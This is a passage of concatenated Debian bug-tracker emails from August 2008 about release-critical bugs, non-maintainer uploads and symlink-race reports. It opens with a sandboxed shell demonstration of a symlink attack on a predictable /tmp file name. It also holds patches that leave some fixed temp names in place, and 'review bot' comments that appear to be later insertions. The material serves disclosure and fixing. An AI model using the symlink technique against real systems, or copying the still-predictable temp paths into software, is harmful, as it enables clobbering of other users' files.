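    sb=$(mktemp -d) || return 1
    mkdir "$sb/tmp"
    printf 'precious\n' > "$sb/victim"
    ln -s "$sb/victim" "$sb/tmp/iozone.log"
    printf '%s\n' "$sb"
}

sb=$(make_sandbox) || exit 1
write_log_fixed "$sb/tmp" > /dev/null
echo "fixed name:  unrelated file now contains '$(cat "$sb/victim")'"
printf 'precious\n' > "$sb/victim"
log=$(write_log_mktemp "$sb/tmp")
echo "mktemp name: unrelated file still contains '$(cat "$sb/victim")'"
echo "log written to $log"
rm -rf "$sb"
```

On current Linux kernels the fs.protected_symlinks sysctl blocks many such follows in sticky world-writable directories, but a script should not depend on it.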
Processed: severity of 495968 is grave
Processing commands for [EMAIL PROTECTED]:

# Automatically generated email from bts, devscripts version 2.10.35
severity 495968 grave
Bug#495968: [gpicview] security RC bugs
Severity set to `grave' from `grave'

End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Processed: severity of 495968 is grave
Processing commands for [EMAIL PROTECTED]:

# Automatically generated email from bts, devscripts version 2.10.35
severity 495968 grave
Bug#495968: [gpicview] security RC bugs
Severity set to `grave' from `serious'

End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Bug#496217: marked as done (mt-daapd: admin page password always fails)
Your message dated Wed, 27 Aug 2008 14:02:03 + with message-id [EMAIL PROTECTED] and subject line Bug#496217: fixed in mt-daapd 0.9~r1696-1.4 has caused the Debian Bug report #496217, regarding mt-daapd: admin page password always fails to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 496217: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496217 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: mt-daapd Version: 0.2.4+r1376-1.1+etch1 Severity: grave Justification: renders package unusable After upgrading to the latest version of mt-daapd in stable, the admin page does not accept the password that's in the config file. 
-- System Information: Debian Release: 4.0 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-4-486 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages mt-daapd depends on: ii adduser3.102 Add and remove users and groups ii avahi-daemon 0.6.16-3etch1 Avahi mDNS/DNS-SD daemon ii libavahi-compat-howl0 0.6.16-3etch1 Avahi Howl compatibility library ii libavcodec0d 0.cvs20060823-8 ffmpeg codec library ii libavformat0d 0.cvs20060823-8 ffmpeg file format library ii libc6 2.3.6.ds1-13etch7 GNU C Library: Shared libraries ii libflac7 1.1.2-8 Free Lossless Audio Codec - runtim ii libid3tag0 0.15.1b-10ID3 tag reading library from the M ii libogg01.1.3-2 Ogg Bitstream Library ii libsqlite3-0 3.3.8-1.1 SQLite 3 shared library ii libtag1c2a 1.4-4 TagLib Audio Meta-Data Library ii libtagc0 1.4-4 TagLib Audio Meta-Data Library (C ii libvorbis0a1.1.2.dfsg-1.4The Vorbis General Audio Compressi ii libvorbisfile3 1.1.2.dfsg-1.4The Vorbis General Audio Compressi ii zlib1g 1:1.2.3-13compression library - runtime mt-daapd recommends no packages. -- no debconf information ---End Message--- ---BeginMessage--- Source: mt-daapd Source-Version: 0.9~r1696-1.4 We believe that the bug you reported is fixed in the latest version of mt-daapd, which is due to be installed in the Debian FTP archive: mt-daapd_0.9~r1696-1.4.diff.gz to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4.diff.gz mt-daapd_0.9~r1696-1.4.dsc to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4.dsc mt-daapd_0.9~r1696-1.4_amd64.deb to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. 
Nico Golde [EMAIL PROTECTED] (supplier of updated mt-daapd package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Wed, 27 Aug 2008 14:53:45 +0200 Source: mt-daapd Binary: mt-daapd Architecture: source amd64 Version: 0.9~r1696-1.4 Distribution: unstable Urgency: low Maintainer: Joshua Kwan [EMAIL PROTECTED] Changed-By: Nico Golde [EMAIL PROTECTED] Description: mt-daapd - iTunes-compatible DAAP server Closes: 483337 496217 Changes: mt-daapd (0.9~r1696-1.4) unstable; urgency=low . * Fix authentication upstream patch checking for a wrong return value (03_fix-authentication.dpatch; Closes: #496217). * Fix taglib api calls (04_taglib_api_calls.dpatch; Closes: #483337) Checksums-Sha1: a481b039be558819f8bc140717368c7ff765badb 1161 mt-daapd_0.9~r1696-1.4.dsc 6fb99300b305f8016f5f27af32281620b7bb8ee0 20572 mt-daapd_0.9~r1696-1.4.diff.gz dc2c4def9b23cdbd610bfb088e7707c0ca439b3c 747266 mt-daapd_0.9~r1696-1.4_amd64.deb Checksums-Sha256: 9dd4d9d75ef46eea098d86676c79e20a31feceb31c36cf9ffaad9fd5adbe384a 1161 mt-daapd_0.9~r1696-1.4.dsc 61be0885353d67d3856ad49d87258d6c1d9bef06ce82b4178d7d6881e1930179 20572 mt-daapd_0.9~r1696-1.4.diff.gz 79f42bb614dac6aa1593fba8e2d03fcb89723386523d68b626158f7f5ae10700 747266 mt-daapd_0.9~r1696-1.4_amd64.deb Files: 5fd1cb8b6b879f5d3f64ac85908c665f 1161 sound optional mt-daapd_0.9~r1696-1.4.dsc 87eaa0bc1ab9d8838533e260cafa03e9 20572 sound optional mt-daapd_0.9~r1696-1.4.diff.gz
Processed: tagging 491655
Processing commands for [EMAIL PROTECTED]:

# Automatically generated email from bts, devscripts version 2.10.35
tags 491655 pending
Bug#491655: audacious: log file spammed with tuple_get_int assertion failure message
Tags were: patch
Tags added: pending

End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Bug#496799: imp4: cyrus.php file missing
Package: imp4
Version: 4.2-1
Severity: grave
Justification: renders package unusable

The file /usr/share/horde3/imp/lib/Quota/cyrus.php has been removed from horde3 (checked horde3 CVS website, stating courier.php and cyrus.php have been merged somehow). However some imp functions still use cyrus.php. Symlinking cyrus.php to imap.php within the same directory solves the situation.

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.25-2-686 (SMP w/1 CPU core)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages imp4 depends on:
ii  horde3         3.2.1+debian0-2  horde web application framework
ii  php-mail-mime  1.5.2-0.1        PHP PEAR module for creating MIME
ii  php5-imap      5.2.6-3          IMAP module for php5

imp4 recommends no packages.

Versions of packages imp4 suggests:
ii  aspell      0.60.6-1      GNU Aspell spell-checker
pn  imapproxy   none          (no description available)
ii  ingo1       1.2-1         email filter component for Horde F
ii  ispell      3.1.20.0-4.4  International Ispell (an interacti
ii  kronolith2  2.2-1         calendar component for Horde Frame
ii  turba2      2.2.1-1       contact management component for h

-- no debconf information
Bug#464281: marked as done (adept: FTBFS: libtool: link: cannot find the library `/usr/lib/libept.la' or unhandled argument `/usr/lib/libept.la')
Your message dated Wed, 27 Aug 2008 16:49:28 +0200 with message-id [EMAIL PROTECTED] and subject line No longer applies. has caused the Debian Bug report #464281, regarding adept: FTBFS: libtool: link: cannot find the library `/usr/lib/libept.la' or unhandled argument `/usr/lib/libept.la' to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 464281: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464281 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: adept version: 2.1.3 Severity: serious User: [EMAIL PROTECTED] Usertags: qa-ftbfs-20080205 qa-ftbfs Justification: FTBFS on i386 Hi, During a rebuild of all packages in sid, your package failed to build on i386. Relevant part: make[4]: Entering directory `/build/user/adept-2.1.3/obj-i486-linux-gnu/adept/installer' g++ -DHAVE_CONFIG_H -I. -I/build/user/adept-2.1.3/./adept/installer -I../.. -I/usr/include/kde -I/usr/share/qt3/include -I. -I/usr/include/tagcoll-2.0.7 -I/usr/include/tagcoll-2.0.7 -I/build/user/adept-2.1.3/./adept/installer/.. -I.. 
-DQT_THREAD_SUPPORT -D_REENTRANT -Wno-long-long -Wundef -ansi -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -Wcast-align -Wconversion -Wchar-subscripts -Wall -W -Wpointer-arith -DNDEBUG -DNO_DEBUG -O2 -g -Wall -O2 -Wformat-security -Wmissing-format-attribute -Wno-non-virtual-dtor -fno-exceptions -fno-check-new -fno-common -fexceptions -DQT_NO_ASCII_CAST -DQT_NO_CAST_ASCII -DINSTALLER_DATA=\/usr/share/app-install\ -c -o main.o /build/user/adept-2.1.3/./adept/installer/main.cpp /build/user/adept-2.1.3/./adept/installer/main.cpp: In function 'int main(int, char**)': /build/user/adept-2.1.3/./adept/installer/main.cpp:16: warning: deprecated conversion from string constant to 'char*' /build/user/adept-2.1.3/./adept/installer/main.cpp:38: warning: unused variable 'args' /usr/share/qt3/bin/moc /build/user/adept-2.1.3/./adept/installer/app.h -o app.moc g++ -DHAVE_CONFIG_H -I. -I/build/user/adept-2.1.3/./adept/installer -I../.. -I/usr/include/kde -I/usr/share/qt3/include -I. -I/usr/include/tagcoll-2.0.7 -I/usr/include/tagcoll-2.0.7 -I/build/user/adept-2.1.3/./adept/installer/.. -I.. 
-DQT_THREAD_SUPPORT -D_REENTRANT -Wno-long-long -Wundef -ansi -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -Wcast-align -Wconversion -Wchar-subscripts -Wall -W -Wpointer-arith -DNDEBUG -DNO_DEBUG -O2 -g -Wall -O2 -Wformat-security -Wmissing-format-attribute -Wno-non-virtual-dtor -fno-exceptions -fno-check-new -fno-common -fexceptions -DQT_NO_ASCII_CAST -DQT_NO_CAST_ASCII -DINSTALLER_DATA=\/usr/share/app-install\ -c -o app.o /build/user/adept-2.1.3/./adept/installer/app.cpp /build/user/adept-2.1.3/./adept/installer/app.cpp:301: warning: unused parameter 'b' /bin/sh ../../libtool --tag=CXX --mode=link g++ -Wno-long-long -Wundef -ansi -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -Wcast-align -Wconversion -Wchar-subscripts -Wall -W -Wpointer-arith -DNDEBUG -DNO_DEBUG -O2 -g -Wall -O2 -Wformat-security -Wmissing-format-attribute -Wno-non-virtual-dtor -fno-exceptions -fno-check-new -fno-common -fexceptions -DQT_NO_ASCII_CAST -DQT_NO_CAST_ASCII -DINSTALLER_DATA=\/usr/share/app-install\ -o adept_installer -L/usr/lib/debug main.o app.o ../adept/libadept.la -lapt-front -ltagcoll2 -lz -lwibble -lkio mkdir .libs libtool: link: cannot find the library `/usr/lib/libept.la' or unhandled argument `/usr/lib/libept.la' make[4]: *** [adept_installer] Error 1 make[4]: Leaving directory `/build/user/adept-2.1.3/obj-i486-linux-gnu/adept/installer' make[3]: *** [all-recursive] Error 1 make[3]: Leaving directory `/build/user/adept-2.1.3/obj-i486-linux-gnu/adept' make[2]: *** [all-recursive] Error 1 make[2]: Leaving directory `/build/user/adept-2.1.3/obj-i486-linux-gnu' make[1]: *** [all] Error 2 make[1]: Leaving directory `/build/user/adept-2.1.3/obj-i486-linux-gnu' make: *** [debian/stamp-makefile-build] Error 2 dpkg-buildpackage: failure: debian/rules build gave error exit status 2 The full build log is available from: http://people.debian.org/~lucas/logs/2008/02/05 A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . 
You're welcome to contribute! About the archive rebuild: The rebuild was done on about 50 AMD64 nodes of the Grid'5000 platform, using a clean chroot containing a sid i386 environment. Internet was not accessible from the build systems. -- | Lucas Nussbaum | [EMAIL PROTECTED] http://www.lucas-nussbaum.net/ | | jabber:
Bug#495154: Processed: RM: tmsnc/testing -- ROM; project discontinued upstream
Hi Miriam, Debian Bug Tracking System wrote: Bug#495154: tmsnc: Package should not go into stable Changed Bug title to `RM: tmsnc/testing -- ROM; project discontinued upstream' from `tmsnc: Package should not go into stable'. based on the bug report, it looks like the release team would prefer removing it (as dead upstream) from unstable as well - testing removals would have been handled by the release team, yet you indicate in the bug that you only want removal from testing. Could you clarify this for me, please? Kind regards T. -- Thomas Viehmann, http://thomas.viehmann.net/
Bug#495968: [gpicview] security RC bugs
Hi, [2] [ 2019485 ] gpicview ask_before_save is ignored with LIBJPEG [3] [ 2019492 ] gpicview ask_before_save is ignored if auto_save_rotated those are no security bugs, there is no way for another user to exploit this. Those are just normal application bugs. Kind regards Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted.
Processed: No longer applies.
Processing commands for [EMAIL PROTECTED]: fixed 464281 3.0~beta1 Bug#464281: adept: FTBFS: libtool: link: cannot find the library `/usr/lib/libept.la' or unhandled argument `/usr/lib/libept.la' Bug marked as fixed in version 3.0~beta1. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database)
Bug#491655: how about fixing this in a Debian revision / NMU
Hi, Luk Claes wrote: Yes, I think it's worth fixing. as not much seems to have happened in for a week (particularly not on Friday), I'll be aiming at a NMU on Saturday. That should also give the maintainers some breathing-room to consider what else they're planning to do. Kind regards T. -- Thomas Viehmann, http://thomas.viehmann.net/
Processed: Re: The possibility of attack with the help of symlinks in some Debian packages
Processing commands for [EMAIL PROTECTED]: tags 496436 patch confirmed Bug#496436: The possibility of attack with the help of symlinks in some Debian packages Tags were: security Tags added: patch, confirmed thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database)
Bug#496436: The possibility of attack with the help of symlinks in some Debian packages
tags 496436 patch confirmed thanks Dmitry E. Oboukhov wrote: Package: gpsdrive-scripts Severity: grave Hi, maintainer! This message about the error concerns a few packages at once. I've tested all the packages (for Lenny) on my Debian mirror. All scripts of packages (marked as executable) were tested. The attached (untested) patch should fix this issue. Cheers, Moritz diff -aur gpsdrive-2.10~pre4.orig/scripts/geo-code gpsdrive-2.10~pre4/scripts/geo-code --- gpsdrive-2.10~pre4.orig/scripts/geo-code 2007-09-14 23:47:07.0 +0200 +++ gpsdrive-2.10~pre4/scripts/geo-code 2008-08-23 22:35:24.0 +0200 @@ -248,7 +248,7 @@ # # Main Program # -TMP=/tmp/geo$$ +TMP=`mktemp` STYLE=${TMP}.style COORDS=${TMP}.coords OUTWAY=${TMP}.way @@ -269,7 +269,7 @@ | head -n1 \ ` if [ $URL = ]; then - cp $COORDS /tmp/geo.google + cp -d $COORDS /tmp/geo.google error Unable to lookup telephone number or name with Google else URL=http://maps.yahoo.com/$URL; @@ -295,7 +295,7 @@ fi if [ $DEBUG -gt 0 ]; then -filter=tee /tmp/geo.yahoo +filter=tee `mktemp` else filter=cat fi Nur in gpsdrive-2.10~pre4/scripts: geo-code~.
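Review bot: in the first hunk, switching to TMP from mktemp secures only the base file; the unchanged lines right below still derive `${TMP}.style`, `${TMP}.coords` and `${TMP}.way` from it, and those sibling names in /tmp are not created atomically, so they can be pre-created as symlinks as soon as the base name exists. Suggest `TMP=$(mktemp -d)`, placing the style, coords and way files inside that directory, checking that mktemp succeeded, and removing the directory in an exit trap.

Review bot: in the second hunk, `cp -d $COORDS /tmp/geo.google` still writes to a fixed, predictable name in /tmp. `-d` only controls how symlinks in the source are handled; a symlink already placed at /tmp/geo.google is still followed when cp opens the destination, so the problem reported in #496436 remains on this path. Suggest writing the copy to a mktemp-created file and naming that file in the error message.

Review bot: in the third hunk, the tee target now comes from mktemp but the generated path is never recorded, so the debug capture that used to be at /tmp/geo.yahoo cannot be found afterwards. Suggest storing the mktemp result in a variable, echoing it to stderr when DEBUG is set, and building `filter` from that variable.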
Bug#495154: Processed: RM: tmsnc/testing -- ROM; project discontinued upstream
2008/8/27 Thomas Viehmann [EMAIL PROTECTED]: Hi Miriam, Debian Bug Tracking System wrote: Bug#495154: tmsnc: Package should not go into stable Changed Bug title to `RM: tmsnc/testing -- ROM; project discontinued upstream' from `tmsnc: Package should not go into stable'. based on the bug report, it looks like the release team would prefer removing it (as dead upstream) from unstable as well - testing removals would have been handled by the release team, yet you indicate in the bug that you only want removal from testing. Could you clarify this for me, please? It would be better to remove it both from testing AND unstable. It makes no sense to keep maintaining it in Debian at all. Thanks, Miry
Bug#496803: util-vserver: system hang when shutting down host
Package: util-vserver Version: 0.30.216~r2772-1 Severity: grave Tags: patch Justification: causes non-serious data loss I'm afraid that /etc/init.d/util-vserver stop hangs if there is at least one guest running; it's usually called on host shutdown when it will block the whole system from rebooting/etc until human intervention, and even worse, it's called after ssh and local logins are already disabled, leaving only Ctrl-Alt-SysRQ or reset+hope for no fs damage. Fix: vserver $vserver stop 21 /dev/null should be: vserver $vserver stop 21 /dev/null
Bug#417142: NMU for websvn
On Wed, Aug 27, 2008 at 04:10:06PM +0200, Thijs Kinkhorst wrote: Hi Pierre, This RC bug has now been open for two weeks. I'm uploading an NMU to the delayed-5 queue according to the attached patch. I hope this helps to keep websvn in good shape in lenny. Hi Thijs, I'm merging your patch and asking for a freeze exception so it can reach lenny in time. Thanks ! Pierre
Bug#491655: [Pkg-audacious-maintainers] Bug#491655: how about fixing this in a Debian revision / NMU
On Wed, 2008-08-27 at 16:52 +0200, Thomas Viehmann wrote: Hi, Luk Claes wrote: Yes, I think it's worth fixing. as not much seems to have happened in for a week (particularly not on Friday), I'll be aiming at a NMU on Saturday. That should also give the maintainers some breathing-room to consider what else they're planning to do. I am not upload enabled at the moment, please proceed with the NMU. You might take a look at some of the other patches and see if they are worthwhile to include in the NMU too. William
Processed: reopening sympa tmp races
Processing commands for [EMAIL PROTECTED]: reopen 494969 Bug#494969: sympa: Leftover debug code may lead to data loss 'reopen' may be inappropriate when a bug has been closed with a version; you may need to use 'found' to remove fixed versions. Bug#496405: The possibility of attack with the help of symlinks in some Debian packages Bug reopened, originator not changed. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database)
Processed: Re: Bug#496410: The possibility of attack with the help of symlinks in some Debian packages
Processing commands for [EMAIL PROTECTED]: severity 496410 important Bug#496410: The possibility of attack with the help of symlinks in some Debian packages Severity set to `important' from `grave' thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database)
Bug#496410: The possibility of attack with the help of symlinks in some Debian packages
severity 496410 important thanks On Wed, Aug 27, 2008 at 07:12:29PM +0400, Dmitry E. Oboukhov wrote: _or_ _causes_ _data_ _loss_ It does not cause data loss, the admin needs to execute it. And now stop bitching around. Bastian -- Superior ability breeds superior ambition. -- Spock, Space Seed, stardate 3141.9
Processed: Re: Bug#495154: Processed: RM: tmsnc/testing -- ROM; project discontinued upstream
Processing commands for [EMAIL PROTECTED]: retitle 495154 RM: tmsnc -- ROM; project discontinued upstream Bug#495154: RM: tmsnc/testing -- ROM; project discontinued upstream Changed Bug title to `RM: tmsnc -- ROM; project discontinued upstream' from `RM: tmsnc/testing -- ROM; project discontinued upstream'. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database)
Bug#417142: marked as done (depends on non-essential package debconf in postrm)
Your message dated Wed, 27 Aug 2008 15:17:05 + with message-id [EMAIL PROTECTED] and subject line Bug#417142: fixed in websvn 2.0-3 has caused the Debian Bug report #417142, regarding depends on non-essential package debconf in postrm to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 417142: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=417142 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: websvn Version: 1.61-22 Severity: serious Tags: etch-ignore Justification: Policy violation, see section 7.2 hi, while running archive wide piuparts tests your package failed on purge because of debconf being unavailable during postrm: Purging configuration files for websvn ... /var/lib/dpkg/info/websvn.postrm: line 6: /usr/share/debconf/confmodule: No such file or directory dpkg: error processing websvn (--purge): subprocess post-removal script returned error exit status 1 Errors were encountered while processing: websvn the full log can be found here: http://people.debian.org/~abi/piuparts/websvn please be sure to use a conditional call to debconf and its commands (this is just an example): -- if [ -f /usr/share/debconf/confmodule ]; then . /usr/share/debconf/confmodule fi db_get ||: -- Please also note: Bugs filed on Packages failing in postrm because of debconf being unavailable are not considered RC for etch, so are tagged etch-ignore. 
bye, - michael ---End Message--- ---BeginMessage--- Source: websvn Source-Version: 2.0-3 We believe that the bug you reported is fixed in the latest version of websvn, which is due to be installed in the Debian FTP archive: websvn_2.0-3.diff.gz to pool/main/w/websvn/websvn_2.0-3.diff.gz websvn_2.0-3.dsc to pool/main/w/websvn/websvn_2.0-3.dsc websvn_2.0-3_all.deb to pool/main/w/websvn/websvn_2.0-3_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Pierre Chifflier [EMAIL PROTECTED] (supplier of updated websvn package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Wed, 27 Aug 2008 17:12:24 +0200 Source: websvn Binary: websvn Architecture: source all Version: 2.0-3 Distribution: unstable Urgency: high Maintainer: Pierre Chifflier [EMAIL PROTECTED] Changed-By: Pierre Chifflier [EMAIL PROTECTED] Description: websvn - interface for subversion repositories written in PHP Closes: 417142 Changes: websvn (2.0-3) unstable; urgency=high . 
* Acknowledge NMU (thanks Thijs Kinkhorst) (Closes: #417142) * Bump standards version to 3.8.0 (no changes) -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFItW70twVrWo1fQMsRAhYrAKCEHn/jam7S3MiGCkYyroAKGhyaXQCdEct2 emoywzQNqrF25HTnv4A5sUc= =UAtG -END PGP SIGNATURE- ---End Message---
Bug#495154: Processed: RM: tmsnc/testing -- ROM; project discontinued upstream
retitle 495154 RM: tmsnc -- ROM; project discontinued upstream thanks Miriam Ruiz wrote: It would be better to remove it both from testing AND unstable. It makes no sense to keep maintaining it in Debian at all. Will do. Thanks for the quick reply! Kind regards T. -- Thomas Viehmann, http://thomas.viehmann.net/
Bug#491655: [Pkg-audacious-maintainers] Bug#491655: how about fixing this in a Debian revision / NMU
William Pitcock wrote: I am not upload enabled at the moment, please proceed with the NMU. You might take a look at some of the other patches and see if they are worthwhile to include in the NMU too. If you can whip up a short MU for sponsoring, we could also go with that. Otherwise, I'd probably focus on the most urgent stuff, so I would appreciate specific suggestions. Kind regards T. -- Thomas Viehmann, http://thomas.viehmann.net/
Bug#496807: gnucash: silently removes main files while trying to save without lock
Package: gnucash Version: 2.2.6-1 Severity: grave Justification: causes data loss I was trying to use gnucash over sshfs, to allow several machines to handle the same file. It complained that it was unable to get a lock, and so couldn't prevent simultaneous writes. This was no problem, because there isn't another person working on them. For the rest, everything seemed to work fine. However, when trying to reopen the file, I found that it had not been written, but instead it was deleted. So not only did I lose the work of the session, but it actually deleted my previous work as well. I tried creating a new file, which also complains about the lock file, but seems to work fine otherwise, but it also doesn't create the file. This would have been a critical issue (causes serious data loss), except that gnucash writes loads of log and backup files, so normally most of the work will not actually be lost. As a quick fix, it would be acceptable to turn the lock warning into an error. Thanks, Bas Wijnen
Bug#491270: bug has been pending for three weeks
Hi, this (RC!) bug has been pending for three weeks now. Unless there are objections, I should think that August is a good month to have a fix uploaded and will see to that if no one else does. Kind regards T. -- Thomas Viehmann, http://thomas.viehmann.net/
Bug#491655: [Pkg-audacious-maintainers] Bug#491655: how about fixing this in a Debian revision / NMU
Hi, On Wed, 2008-08-27 at 17:40 +0200, Thomas Viehmann wrote: William Pitcock wrote: I am not upload enabled at the moment, please proceed with the NMU. You might take a look at some of the other patches and see if they are worthwhile to include in the NMU too. If you can whip up a short MU for sponsoring, we could also go with that. Otherwise, I'd probably focus on the most urgent stuff, so I would appreciate specific suggestions. Alright, I'll publish 1.5.1-4 on mentors sometime before Friday. William
Bug#496808: ruby1.8: DoS vulnerability in rexml parsing module
Package: ruby1.8 Version: 1.8.5-4etch2 Severity: grave Tags: security Justification: user security hole The rexml lib is vulnerable to a DoS attack. Please see http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/. I know there isn't an official patch yet (except the overloading of the REXML module via http://www.ruby-lang.org/security/20080823rexml/rexml-expansion-fix.rb) but I expect that to be out soon. -- System Information: Debian Release: 4.0 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-domu Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages ruby1.8 depends on: ii libc6 2.3.6.ds1-13etch7 GNU C Library: Shared libraries ii libruby1.8 1.8.5-4etch2 Libraries necessary to run Ruby 1. ruby1.8 recommends no packages. -- no debconf information
Bug#496807: gnucash: silently removes main files while trying to save without lock
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 forwarded 496807 http://bugzilla.gnome.org/show_bug.cgi?id=549595 thanks Hi Bas, thank you for your feedback on Gnucash. I have forwarded your report to the upstream bug tracker as http://bugzilla.gnome.org/show_bug.cgi?id=549595 Regards Micha -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFItXzCWN0/4pnhQbQRAiKrAJ9UwCF+zvVF7T2e2WIVlKhG/n5BPACfTC74 GpT7oBeAcLVsN96/1ihqrD8= =A28K -END PGP SIGNATURE-
Processed: Re: Bug#496807: gnucash: silently removes main files while trying to save without lock
Processing commands for [EMAIL PROTECTED]: forwarded 496807 http://bugzilla.gnome.org/show_bug.cgi?id=549595 Bug#496807: gnucash: silently removes main files while trying to save without lock Noted your statement that Bug has been forwarded to http://bugzilla.gnome.org/show_bug.cgi?id=549595. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database)
Bug#496808: ruby1.8: DoS vulnerability in rexml parsing module
On Wednesday 27 August 2008 17:56, Frank Louwers wrote: The rexml lib is vulnerable to a DoS attack. Please see http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/. This is CVE-2008-3790. Please mention it in the package changelog on uploads. Thijs
Bug#493217: libnfsidmap-0.21 is available
Kevin Coffman wrote: --- libnfsidmap-0.21/libnfsidmap.c~ 2008-08-02 10:52:00.289845221 +1200 +++ libnfsidmap-0.21/libnfsidmap.c 2008-08-02 10:47:50.647889312 +1200 @@ -101,7 +101,7 @@ char plgname[128]; int ret = 0; - snprintf(plgname, sizeof(plgname), %s%s.so, PLUGIN_PREFIX, method); + snprintf(plgname, sizeof(plgname), %s%s.so.0, PLUGIN_PREFIX, method); dl = dlopen(plgname, RTLD_NOW | RTLD_LOCAL); if (dl == NULL) { Getting back to this. I'm curious if there is a specific reason why the *.so symlink was not there? Adding the .0 shouldn't be necessary. But there may be a reason for not including the .so symlink that I am not aware of. The reason the version (or a version) number is needed is because some distros only installed the .so with the -devel package which is not normally installed... The question is how do we get the version to change automagically when the soname changes? steved.
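Review bot: the added snprintf line hard-codes the `.so.0` suffix in the format string, so plugin loading will silently stop working the next time the plugin soname changes, which is the open question at the end of this reply. Suggest having the build supply the suffix next to PLUGIN_PREFIX (a generated macro, name to be chosen) instead of a literal. The snprintf return value is also not checked before `dlopen(plgname, ...)`: a long `method` is truncated to fit `plgname[128]` and a different name is handed to dlopen, so compare the result against `sizeof(plgname)` and fail on truncation.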
Bug#496810: initscript nsca fails when invocked with start and already running
Package: nsca Version: 2.6-3.2 Severity: serious Hi, you should add in README.Debian that dpkg-reconfigure nsca is needed to install startup links (I discovered it by looking at /var/lib/dpkg/info/nsca.postinst..., not something usual users want to do). README.Debian currently says : by default nsca works with an init script /etc/init.d/nsca But it does not say that, by default, symlinks are not installed. [This would be wishlist bug] However, trying to enable nsca, I found a bug: atsina:/etc/init.d# dpkg-reconfigure nsca update-rc.d: warning: /etc/init.d/nsca missing LSB information update-rc.d: see http://wiki.debian.org/LSBInitScripts Starting Nagios Service Check Acceptor: /usr/sbin/nsca already running. ERROR: could not start nsca. invoke-rc.d: initscript nsca, action start failed. atsina:/etc/init.d# Missing LSB headers are already reported. But nsca also fails to return a 0 code when already running: atsina:/etc/init.d# /etc/init.d/nsca start ; echo $? Starting Nagios Service Check Acceptor: /usr/sbin/nsca already running. ERROR: could not start nsca. 1 atsina:/etc/init.d# According to policy 9.3.2 (and recent discussions on debian-devel), starting an already running service or stopping an already stopped service must not return an error code. Best regards, Vincent -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.27-rc3-amd64 (SMP w/2 CPU cores) Locale: 